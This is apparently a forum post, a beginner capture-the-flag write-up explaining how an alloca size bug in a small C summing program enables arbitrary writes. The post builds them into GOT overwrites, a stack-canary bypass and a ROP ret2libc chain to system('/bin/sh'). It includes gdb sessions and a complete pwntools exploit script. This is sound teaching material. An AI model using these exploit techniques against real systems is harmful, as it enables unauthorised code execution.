Punishing code with magic numbers with ROP and ret2libc on an x86_64

Punishing code with magic numbers with ROP and ret2libc on an x86_64

Difficulty: Beginner

CTF: /zer0pts/pwn/protude (ASLR is enabled here)

The vulnerable program

This program takes an integer N and N other integers as input. Then it calculates and prints the sum of these numbers.
A pretty standard exercise when you are learning a new programming language.

We are going to attempt to exploit it get RCE. Take a few moments to absorb the code before moving on.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

long n;

long read_long() {
  char buf[32];
  int readByte;
  memset(buf, 0, sizeof(buf));          // sets memory to 0
  readByte = read(0, buf, sizeof(buf)); // reads 32 bytes of input
  if (readByte == 0) {
    puts("[ERROR] read failed");        // no bytes read = exit()
    exit(1);
  }
  return atol(buf);                     // convert input to long
}

void setup() {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
}

void calc_sum(void) {
  long i;
  long *array;
  long result;
  
  array = (long*)alloca(n * 4);       

  for(i = 0; 0 <= i && i < n; i++) {
    printf("num[%ld] = ", i + 1);
    array[i] = read_long();
  }

  for(result = 0, i = 0; i < n; i++) {
    result += array[i];
  }

  printf("SUM = %ld\n", result);
}

int main() {
  setup();
    
  printf("n = ");
  n = read_long();
  if (n <= 0x00 || n > 22) { // size has to be 1-22
    puts("Invalid input");
  } else {
    calc_sum();
  }
  return 0;
}

Setup

Let’s set up a few things before we start:

  • Disable ASLR
    echo 0 > /proc/sys/kernel/randomize_va_space
    
  • Disable PIE (during compilation)
  • Enable DEP (during compilation)
  • Enable stack protector (during compilation)

The binary is provided to you here.

Static Analysis

Inspecting code that handles user input.

Let’s take a closer look at the user input function.

long read_long() {
  char buf[32];
  int readByte;
  memset(buf, 0, sizeof(buf));          // sets memory to 0
  readByte = read(0, buf, sizeof(buf)); // reads 32 bytes of input
  if (readByte == 0) {
    puts("[ERROR] read failed");        // no bytes read = exit()
    exit(1);
  }
  return atol(buf);                     // convert input to long
}

We have a buffer of 32 bytes. read(0, buf, sizeof(buf)) reads at most 32 characters. Therefore, there is no way to overwrite the stack using read. : (

We have an interesting call to atol(buf) at the end, but we cannot get anything out of it. The function will simply return 0 on any suspicious input.

Although the function implementation uses bad practices, we don’t have anything interesting going on.

Inspecting the function that calculates the sum.

void calc_sum(void) {
  long i;
  long *array;
  long result;
  
  array = (long*)alloca(n * 4);       

  for(i = 0; 0 <= i && i < n; i++) {
    printf("num[%ld] = ", i + 1);
    array[i] = read_long();
  }

  for(result = 0, i = 0; i < n; i++) {
    result += array[i];
  }

  printf("SUM = %ld\n", result);
}

If you are unfamiliar with alloca, man 3 alloca to check the manual page for it.

The alloca() function allocates size bytes of space in the stack frame of the caller. This temporary space is automatically freed when the function that called alloca() returns to its caller

alloca allocates memory in the stack frame of the caller, in this case, calc_sum.

This is an interesting choice. Usually, people use malloc to allocate space at runtime. But in this case, since n is bound to 1-22, it is not too bad. Too much stack space is not used.

Then, N integers that are read from read_long() are placed in the memory we allocated.
The sum is calculated and the result is printed. Not too much going here as well.

If you want to figure out the vulnerability on your own, stop here.

Introducing magic numbers

The term magic number or magic constant refers to the anti-pattern of using numbers directly in source code

The use of magic numbers is often frowned upon. They make your code difficult to understand and often introduce subtle bugs.

Take a look at the following piece of code from Wikipedia.

   for i from 1 to 52
       j := i + randomInt(53 - i) - 1
       a.swapEntries(i, j)

52 and 53 (and most other numbers which has no meaning in local context) is a magic number.
In this above case, the only problem this poses is a slight annoyance over the mysterious 52. Cases like the following, however, may create portability issues.

const int array_size = 20;
int *ptr = (int*) malloc(array_size * 4);

Here, 4 is the magic number. The peice of code above executes properly in systems where the sizeof (int) == 4. But if it is 2, it breaks miserably when we attempt to use ptr.

If we were to write this properly, we would use something like.

const int array_size = 20;
int *ptr = (int*) malloc(array_size * sizeof (int));

Okay, now you are equipped with the knowledge of magic numbers! Let us approach this problem again.

Finding an arbitrary write.

Take a look at:

  array = (long*) alloca(n * 4);       

This is the exact portability issue that we discussed earlier.
Only sizeof(char) is fixed as 1 by the C standard. Everything else usually only has minimum size requirements. The compiler can choose whatever size it sees is the best.
Usually, in x86_64 compilers make the sizeof(long) == 8. This is convenient because a long will fit in a register.

In this case, sizeof(long) == 8

So we have allocated space like alloca(n * 4); yet the sizeof(long) == 8 (In x86_64, this is usually the case).

Therefore, we are only allocating enough memory for n/2 longs. Yet, we access all n of them. We are accessing memory not allocated for us! Also, we can write to that memory.

Even more convenient is the fact that alloca was used. The extra memory we are addressing is on the stack.

The stack frame will usually look like this for the calc_sum function.

-----------------------------------------
|      Arguments to the function        |
-----------------------------------------
|           Return Address              |
-----------------------------------------
|      Local variables of calc_sum      |
-----------------------------------------
|          Alloca(n*4) buffer           |
-----------------------------------------

We can potentially overwrite the local variable array to achieve arbitrary write!

Exploiting the arbitrary write once.

Let’s fire up gdb:

gdb-peda$ r
n = 21
num[1] = 
num[2] = 
num[3] = 
num[4] = 
... 
num[15] = 
num[2] = 

We use n = 21. Note that n is restricted to 1-22 (re-read the code if you are confused).

I just pass it empty strings so that num[1] through num[15] will be equal to 0.

We notice that after num[15], we loop back to num[2].
We have overwritten the local variable i!

Since we have overwritten the local variable i with 0, we again start the loop from 2. (i++ is done at the end and printf() uses i+1).

We are looping indefinitely.

But, looping indefinitely is not useful to us.
To write to memory beyond this, we override the i with 14 (exactly the current index).
So that in the next iteration we get to num[16].

gdb-peda$ r
n = 21
num[1] = 
...
num[15] = 14
num[16] = 

We can now write past the limit and override *array in the next iteration! Then write to *(array+n) in the iteration after that!. That means since we control array we can write to anywhere we wish.

Let’s try to override the printf's GOT entry to point to the puts() call in the code to test things.

First, we get the GOT entry of printf.

gdb-peda$ x/i printf
   0x400690 <[email protected]>:
    jmp    QWORD PTR [rip+0x20099a]        #0x601030

0x601030 is the GOT offset of printf

We then get the location where the puts call is made.

gdb-peda$ disass read_long
Dump of assembler code for function read_long:
   0x00000000004007c7 <+0>:     push   rbp
   0x00000000004007c8 <+1>:     mov    rbp,rsp
   ...
   0x0000000000400813 <+76>:    lea    rdi,[rip+0x28a]        # 0x400aa4
   0x000000000040081a <+83>:    call   0x400660 <[email protected]>
   ...
   End of assembler dump.

0x000000000040081a is the place we want the GOT offset to point to.

So we override the value at 0x601030 with 0x000000000040081a

gdb-peda$ r
n = 21
num[1] =
...
num[15] = 14
num[16] = 
num[17] = 6295464
num[18] = 4196378
num[%ld] = 
[Inferior 1 (process 16567) exited with code 01]

As you can see, num[%ld] = was printed without formatting. Awesome.
[email protected] jumped to call [email protected] (and the call [email protected] next).

But wait a minute…
The careful reader might have noticed,
0x601030 = 6295600
But we have used, 6295464 in gdb which is 0x601030 - 17*8

Why so?
This is because in the next iteration we override the value at array[17] not array[0] therefore we correct the address by subtracting with 17 * sizeof(long)

With this, we have achieved arbitrary write!!

As of right now, we can only overwrite to memory once. But, it is still a step in the right direction.

Overwriting to memory more than once.

In order to overwrite to arbitrary memory more than once, we need to find a way to jump to the top of the calc_sum() function whenever we want.
We will do this with a GOT entry overwrite.

Take a look at the following code from read_long.

  readByte = read(0, buf, sizeof(buf)); // reads 32 bytes of input
  if (readByte == 0) {
    puts("[ERROR] read failed");        // no bytes read = exit()
    exit(1);
  }

Bring up the man page of read: man 2 read.

On success, the number of bytes read is returned (zero indicates the end of file)

The if block only executes when we provide EOF to the input stream. If we overwrite either the puts or the exit GOT entry to point to the top of the calc_sum function, we can send an EOF to jump to the top of the function. This will allow us to overwrite regions of memory multiple times.

The relevant info:

calc_sum = 0x40088e = 4196494
[email protected] = 0x601018 

Again, we need to overwrite the correct address so we correct the address 0x601018 so that array[17] will point to 0x601018

0x601018 - 17*8 = 6295440
gdb-peda$ r
n = 21
num[1] = 
...
num[15] = 14
num[16] = 
num[17] = 6295440
num[18] = 4196494
num[19] = num[1] = 

I used CTRL + D to send a EOF to the terminal. We can see the output num[1]. We jumped to the start of the calc_sum again!
We can use this to overwrite to memory any number of times.

ROP and ret2libc

In this challenge, we have DEP and stack cookies that protect executing stack space and checking if the stack frame has been overwritten.

Most of the time, we do not have a space in a process that is both writable and executable.
For instance let’s check for our current executable.

[[email protected] ~/]$ ./thebinary &
n =                                 
[[email protected] ~/]$ ps aux | grep thebinary
gnik     16890  0.0  0.0  10696  1040 pts/1    t    16:01   0:00 /home/gnik/thebinary
[[email protected] ~/]$ pmap 16890
16890:   /home/gnik/thebinary
0000000000400000      4K r-x-- thebinary
0000000000600000      4K r---- thebinary
0000000000601000      4K rw--- thebinary
00007ffff73ba000    104K r-x-- libpthread-2.27.so
00007ffff73d4000   2044K ----- libpthread-2.27.so
00007ffff75d3000      4K r---- libpthread-2.27.so
00007ffff75d4000      4K rw--- libpthread-2.27.so
00007ffff75d5000     16K rw---   [ anon ]
00007ffff75d9000     12K r-x-- libdl-2.27.so
00007ffff75dc000   2044K ----- libdl-2.27.so
00007ffff77db000      4K r---- libdl-2.27.so
00007ffff77dc000      4K rw--- libdl-2.27.so
00007ffff77dd000   1948K r-x-- libc-2.27.so
00007ffff79c4000   2048K ----- libc-2.27.so
00007ffff7bc4000     16K r---- libc-2.27.so
00007ffff7bc8000      8K rw--- libc-2.27.so
00007ffff7bca000     16K rw---   [ anon ]
00007ffff7bce000     24K r-x-- libgtk3-nocsd.so.0
00007ffff7bd4000   2044K ----- libgtk3-nocsd.so.0
00007ffff7dd3000      4K r---- libgtk3-nocsd.so.0
00007ffff7dd4000      4K rw--- libgtk3-nocsd.so.0
00007ffff7dd5000    156K r-x-- ld-2.27.so
00007ffff7fbe000     16K rw---   [ anon ]
00007ffff7ff7000     12K r----   [ anon ]
00007ffff7ffa000      8K r-x--   [ anon ]
00007ffff7ffc000      4K r---- ld-2.27.so
00007ffff7ffd000      4K rw--- ld-2.27.so
00007ffff7ffe000      4K rw---   [ anon ]
00007ffffffde000    132K rw---   [ stack ]
ffffffffff600000      4K r-x--   [ anon ]
 total            10700K

As you can see, none of them have both the write and execute bit set.

This is a pretty common security measure, so we cannot write shellcode to a certain memory region and jump to it.

This is where ret2libc and ROP come into play.

With ret2libc we are jumping to certain points in the libc library that is loaded at runtime. For instance, we can jump to potentially dangerous places like system() which is present in libc.

With ROP we jump to small code segments in the address space of the process that does a certain task before jumping to a different segment. Chaining a bunch of these ROP gadgets can hence be very powerful.

Our plan to achieve RCE is as follows:

  • Find the address of system() in libc
  • Find the address of the string '/bin/sh/` lin libc
  • Find a ROP gadget that can place the address of the /bin/sh string in the rdi register.
  • Jump to system()

Finding the address of system() and the string ‘/bin/sh’ is pretty straight forward.

gdb-peda$ start
....
Temporary breakpoint 1, 0x00000000004009bd in main ()
gdb-peda$ p system
$1 = {int (const char *)} 0x7ffff782c440 <__libc_system>
gdb-peda$ info proc map
process 17653
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
      .......
      .......
      0x7ffff77dd000     0x7ffff79c4000   0x1e7000        0x0 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff79c4000     0x7ffff7bc4000   0x200000   0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff7bc4000     0x7ffff7bc8000     0x4000   0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff7bc8000     0x7ffff7bca000     0x2000   0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff7bca000     0x7ffff7bce000     0x4000        0x0 
      0x7ffff7bce000     0x7ffff7bd4000     0x6000        0x0 /usr/lib/x86_64-linux-gnu/libgtk3-nocsd.so.0
      .......
      .......
gdb-peda$ find  '/bin/sh' 0x7ffff77dd000 0x7ffff79c4000
Searching for '/bin/sh' in range: 0x7ffff77dd000 - 0x7ffff79c4000
Found 1 results, display max 1 items:
libc : 0x7ffff7990e9a --> 0x68732f6e69622f ('/bin/sh')

The system() function is present in 0x7ffff782c440
Address of the string ‘/bin/sh’ is 0x7ffff7990e9a

These addresses are most likely different for your machine

Learning to write exploit scripts.

Sufficient knowledge of python is assumed, although not necessary to understand this section.

There are a lot of ways to write your exploit scripts.
I will keep things simple and write one in using python3 and pwntools

We will do everything we have done so far with gdb in python.

Create a new python script.

import pwn
import tty

You can install pwntools with pip and import pwn to work with it. We will also be using some constants from tty

p = pwn.process('./thebinary', stdin=pwn.PTY, raw = False)

# g = pwn.gdb.attach(p, """
# """)

This is how you start a local process in pwntools. Note the raw = False and stdin=pwn.PTY!
These options are essential to our current project since we write EOF to stream and not close our stream. (Yes this sounds weird, but this is necessary.)
You can experiment with attaching the debugger by uncommenting some lines here.

def setup():
    p.sendline('21')

def write_junk(count):
    for x in range(count):
        p.sendline('')

def overwrite_memory(addr, data):
    p.sendline('14')
    p.sendline('')
    p.sendline(str(addr))
    p.sendline(str(data))


def send_eof():
    """
    Note Send EOF sends 2 bytes!!!
    """
    p.sendline(chr(tty.CEOF))

These are some of the functions that will be useful to us. The functions are self-explanatory. If you have never written an exploit before with pwntools, feel free to experiment here. p.sendline() is used to send a line to the process.


setup()
"""
Overwrite the GOT of puts for the ability to write memory many times
"""
write_junk(14)
# 0x40088e = calc_sum
# 0x601018 = GOT of puts
# Overwrite GOT of puts with calc_sum
overwrite_memory(0x601018 - 17*8, 0x40088e)
send_eof()

p.interactive()

Okay, so now that all that is over, we will first overwrite the GOT entry of puts with calc_sum so that we can use EOF to jump to it again. Our nifty little overwrite_memory() function makes this easier.

The p.interactive() at the end is used to make the process interactive. After this, you can use the terminal for IO.

I recommend you experiment with the script.

Things that are necessary for the exploit to work.

These are some things that will be useful to us as we move on to ROP.

  1. Overwrite the GOT entry of __stack_chk_fail to point to the leaveq; ret instruction in calc_sum to bypass stack smashing check.
  2. Overwrite the value of n to 30 so that we can overwrite more memory at once. (This is used in the ROP step later)

I will not show this in gdb since I have already shown you how to overwrite arbitrary memory, and the writeup will be pretty repetitive if I include this.

If you are confused, please refer to the code snippet below from the exploit script.

"""
Overwrite the GOT of __stack_chk_fail for beating the stack cookie
"""
write_junk(13)
# 0x601020 = GOT of __stack_chk_fail
# 0x4009b3 = leaveq retq instruction in calc_sum, essentially beating the stack_chk_fail
overwrite_memory(0x601020 - 17*8, 0x4009b3)
send_eof()

"""
Overwrite global n to overwrite more data on the stack
"""
write_junk(13)
# n = 0x6010b0
# Overwrite n with 30
overwrite_memory(0x6010b0 - 17*8, 30)
send_eof()

Finding the necessary ROP gadgets

I use ROPgadget tool to find the necessary ROP gadgets from the executable. You can use the plethora of alternatives available to you. (gdb-peda also has one!)

[[email protected] ~/]$ 
ROPgadget --binary thebinary 
...
0x0000000000400a83 : pop rdi ; ret
...
0x0000000000400646 : ret
...

Unique gadgets found: 112

We will need two ROP gadgets, pop rdi; ret and ret.
pop rdi; ret to load the address of the string into the rdi register and then ret gadget to align the stack address for the movqs instruction. (The reason this is necessary is left as an exercise.)

Writing the final exploit script.

We finally have all the tools that we need to write a final exploit script.

The final exploit script looks something like.

import pwn
import tty

p = pwn.process('./thebinary', stdin=pwn.PTY, raw = False)

#g = pwn.gdb.attach(p, """
#b *0x00000000004009b8
#c
#""")

def setup():
    p.sendline('21')

def write_junk(count):
    for x in range(count):
        p.sendline('')

def overwrite_memory(addr, data):
    p.sendline('14')
    p.sendline('')
    p.sendline(str(addr))
    p.sendline(str(data))


def send_eof():
    """
    Note Send EOF sends 2 bytes!!!
    """
    p.sendline(chr(tty.CEOF))


setup()
"""
Overwrite the GOT of puts for the ability to write memory many times
"""
write_junk(14)
# 0x40088e = calc_sum
# 0x601018 = GOT of puts
# Overwrite GOT of puts with calc_sum
overwrite_memory(0x601018 - 17*8, 0x40088e)
send_eof()


"""
Overwrite the GOT of __stack_chk_fail for beating the stack cookie
"""
write_junk(13)
# 0x601020 = GOT of __stack_chk_fail
# 0x4009b3 = leaveq retq instruction in calc_sum, essentially beating the stack_chk_fail
overwrite_memory(0x601020 - 17*8, 0x4009b3)
send_eof()

"""
Overwrite global n to overwrite more data on the stack
"""
write_junk(13)
# n = 0x6010b0
# Overwrite n with 30
overwrite_memory(0x6010b0 - 17*8, 30)
send_eof()


"""
Overwrite the stack with ROP chain for ret2libc
"""
write_junk(17)
p.sendline('24')
# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))

# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))

# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))

# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))
p.sendline("")
p.interactive()

Most of the script has already been discussed.
Let us focus on the rest that remains.

"""
Overwrite the stack with ROP chain for ret2libc
"""
write_junk(17)
p.sendline('24')
# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))

# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))

# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))

# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))
p.sendline("")
p.interactive()

The first question that needs to be answered: Why have some constants changed?
write_junk(13) was used while overwriting memory the last time why is write_junk(17) used this time?

This is due to the fact that n = 21 in all previous cases but we have just recently overwritten n = 30 so that we can overwrite more of the stack. Hence, the offsets at which the local variable i is overwritten has changed.
You can experiment with the same method used above to figure out the offset when n = 30.

Okay, now let’s discuss the ROP part of the exploit.

# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))

# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))

# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))

# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))

To set up our exploit, we overwrite the stack to the point where we can overwrite the return address.
We then place the address of the pop rdi; ret ROP gadget followed by the address to the /bin/sh string.

When the function returns, it jumps to execute pop rdi; ret. Since the address of the string is on the stack, pop rdi places the address of the string in the rdi register. And then we ret to another address…

… The address we jump to is the address of ret instruction. ret gadget is used to align our stack. (This is necessary since movaps instruction (used by system()) needs the stack to be 16 bit aligned.). ret is a NOP in ROP (a gadget that does nothing).

Note that this might not be necessary if your stack is already 16 bit aligned.

We then place the address of the system call on the stack. The ret gadget then pops this address off the stack and then jumps to system() in libc.

We have successfully placed the address of the string ‘/bin/sh’ in rdi and then jumped to system()!

Wait… There is more…
Remember we overwrote the GOT entry of __stack_chk__fail so that the stack cookie check would unconditionally return to leaveq; ret
Since we have overwritten the return address, we have surely overwritten the stack cookie.
Therefore, if we hadn’t overwritten the GOT entry of __stack_chk_fail our exploit would have failed.

We can also overwrite a GOT entry and jump using that to avoid this.

Putting it all together

[[email protected] ~/]$ python3 exploit.py
[+] Starting local process './thebinary': pid 18969
[*] Switching to interactive mode
n = 21
....
....
SUM = -3105548685935727921
$ $ whoami
whoami
gnik

This is my first post here in 0x00sec, so any feedback would be helpful. In an upcoming writeup, we will exploit the same executable but with ASLR enabled. : )

7 Likes

I loved this article! Thanks for sharing! I would love to learn more around similar things :slight_smile:

1 Like